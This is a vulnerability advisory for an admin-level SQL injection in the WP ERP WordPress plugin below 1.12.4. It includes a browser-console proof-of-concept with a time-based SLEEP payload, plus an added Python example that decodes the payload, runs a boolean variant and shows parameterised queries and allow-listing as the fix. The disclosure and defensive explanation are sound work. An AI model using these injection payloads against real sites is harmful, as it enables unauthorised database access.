WPVDB-ID: 435DA8A1-9955-46D7-A508-B5738259E731
Source: wpvulndb
Author: Arvandy
Published: Jun 05, 2023

WP ERP < 1.12.4 - Admin+ SQL Injection

Reference: wpscan.com
Tags: wp erp, sql injection, rest api, admin, privilege escalation, security vulnerability

EPSS: 0.001 (Low), percentile 41.0%

The plugin does not properly sanitise and escape the type parameter in the erp/v1/accounting/v1/people REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

PoC

Sign in as an admin. In WP Admin, run the following in the browser console (wp.apiRequest attaches the logged-in user's REST nonce and cookies, which is why it must be run from an authenticated admin page rather than with a plain unauthenticated request). The request takes several seconds to complete, matching the injected SLEEP(3), which demonstrates the SQL injection:

await wp.apiRequest({path: "/erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x"});
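The payload above is hard to read URL-encoded. The following is an added example, not WP ERP's own code and not part of the original advisory: it decodes the PoC's type parameter the way the server does, shows the statement that string concatenation produces from it, and contrasts that with a bound parameter (the WordPress-side equivalent is $wpdb->prepare() with a %s placeholder) and an allow-list check. The table name erp_peoples, its columns, the shape of the vulnerable statement and the allowed type values are assumptions for illustration, not the plugin's real schema or query. SQLite has no SLEEP(), so the part that actually executes uses a boolean twin of the PoC with the same quote and parenthesis structure.

```python
# Added example, not WP ERP's own code: decode the advisory's PoC payload,
# show what string-built SQL turns it into, and contrast that with a
# parameterised query plus an allow-list. Table/column names, the query
# shape and the allowed "type" values are assumptions, not the plugin's.
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The path from the PoC above (the wp.apiRequest wrapper is not needed here).
POC_PATH = ("/erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+"
            "(SELECT+SLEEP(3))x)+AND+('x'%3d'x")

# Assumed shape of the vulnerable statement: the value is dropped into a
# parenthesised, single-quoted comparison. That is exactly what the payload's
# leading  x')  and trailing  ('x'='x  are written to balance.
VULNERABLE_TEMPLATE = "SELECT id, first_name FROM erp_peoples WHERE (type = '{}')"
SAFE_SQL = "SELECT id, first_name FROM erp_peoples WHERE (type = ?)"

ALLOWED_TYPES = {"customer", "vendor", "employee"}  # assumed allow-list


def type_param(path):
    """Return ?type= decoded as a server decodes it: '+' -> space, %3d -> '='."""
    query = urlsplit(path).query
    return parse_qs(query, keep_blank_values=True).get("type", [""])[0]


def resolve_vulnerable_sql(type_value):
    """The statement that string concatenation produces (the bug)."""
    return VULNERABLE_TEMPLATE.format(type_value)


def make_db():
    """Constructed in-memory sample rows standing in for the plugin's people table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE erp_peoples (id INTEGER, first_name TEXT, type TEXT)")
    con.executemany("INSERT INTO erp_peoples VALUES (?, ?, ?)",
                    [(1, "Ada", "customer"), (2, "Bob", "vendor"), (3, "Cy", "employee")])
    return con


# SQLite has no SLEEP(), so the runnable part uses the boolean twin of the
# PoC: same quote/paren structure, but it widens the WHERE clause instead
# of delaying it.
BOOLEAN_PAYLOAD = "x') OR ('x'='x"


def query_vulnerable(con, type_value):
    """Concatenated query: the payload rewrites the statement."""
    return sorted(row[1] for row in con.execute(resolve_vulnerable_sql(type_value)))


def query_parameterised(con, type_value):
    """Bound parameter: the payload is compared as a literal string and matches nothing."""
    return sorted(row[1] for row in con.execute(SAFE_SQL, (type_value,)))


def validate_type(type_value):
    """Allow-list check for a parameter that only has a handful of legal values."""
    if type_value not in ALLOWED_TYPES:
        raise ValueError(f"rejected type value: {type_value!r}")
    return type_value


if __name__ == "__main__":
    decoded = type_param(POC_PATH)
    print("decoded payload :", decoded)
    print("resolved SQL    :", resolve_vulnerable_sql(decoded))
    db = make_db()
    print("concatenated    :", query_vulnerable(db, BOOLEAN_PAYLOAD))    # every row
    print("parameterised   :", query_parameterised(db, BOOLEAN_PAYLOAD))  # no rows
```

Decoded, the PoC value reads x') AND (SELECT 1 FROM (SELECT SLEEP(3))x) AND ('x'='x; under the assumed template it closes the quoted comparison, inserts a subquery that sleeps, and reopens a trivially true comparison so the statement stays balanced. With a bound parameter the same bytes are just an unusual type value, and an allow-list rejects them before any query is built.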

Affected versions

CPE Name   Operator   Version
erp        lt         1.12.4
